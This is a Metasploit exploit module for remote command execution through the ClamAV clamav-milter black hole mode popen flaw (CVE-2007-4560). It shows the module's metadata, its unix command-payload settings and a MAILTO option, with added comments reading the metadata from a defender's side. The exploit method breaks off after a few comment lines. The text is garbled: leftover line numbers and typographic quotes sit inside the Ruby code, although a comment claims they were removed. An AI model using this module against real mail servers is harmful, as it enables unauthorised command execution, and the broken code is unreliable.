##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

12 require ’msf/core’
15 class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Smtp
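# Declares the module's metadata (name, description, references, payload
# constraints, target list) and registers the MAILTO option.
#
# The listing this was recovered from had typographic quotes and minus
# signs in place of ASCII ' and -, plus gutter numbers and a page header
# interleaved with the code; those are restored here so the hash parses
# and the reference IDs are searchable as written in advisories.
#
# Reading the metadata from a defender's side:
# - The Description ties the flaw to clamav-milter running with black hole
#   mode enabled, where an insecure popen call allows remote command
#   execution. Per that description, a milter without black hole mode does
#   not meet the stated precondition.
# - 'Privileged' => true presumably marks the resulting access as
#   privileged; confirm against the framework documentation before using
#   it to rate impact.
# - The payload is restricted to command payloads ('PayloadType' => 'cmd',
#   ARCH_CMD, platform 'unix') of at most 1024 bytes.
#
# NOTE(review): the fixed-version string in the Description should be
# checked against the vendor advisory for the referenced CVE before it is
# used for patch triage.
#
# @param info [Hash] metadata overrides merged in through update_info
def initialize(info = {})
  super(update_info(info,
    'Name'           => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
    'Description'    => %q{
        This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
        (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
        When implemented with black hole mode enabled, it is possible to execute
        commands remotely due to an insecure popen call.
    },
    'Author'         => [ 'patrick' ],
    'License'        => MSF_LICENSE,
    'Version'        => '$Revision$',
    # Identifiers to pivot on when matching scanner findings or advisories
    # to this module.
    'References'     =>
      [
        [ 'CVE', '2007-4560' ],
        [ 'OSVDB', '36909' ],
        [ 'BID', '25439' ],
        [ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
      ],
    'Privileged'     => true,
    'Payload'        =>
      {
        'DisableNops' => true,
        'Space'       => 1024,
        'Compat'      =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl ruby bash telnet',
          }
      },
    'Platform'       => 'unix',
    'Arch'           => ARCH_CMD,
    'Targets'        =>
      [
        [ 'Automatic', { }],
      ],
    'DisclosureDate' => 'Aug 24 2007',
    'DefaultTarget'  => 0))

  # MAILTO is required; its default is the local address nobody@localhost.
  register_options(
    [
      OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
    ], self.class)
end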
def exploit
65
66
# ClamAV writes randomized msg.###### temporary files in a randomized
67
# /tmp/clamav−#######################/ directory. This directory is
68
# the clamav−milter process working directory.
69
#
70
# We *can* execute arbitrary code directly from ’sploit’, however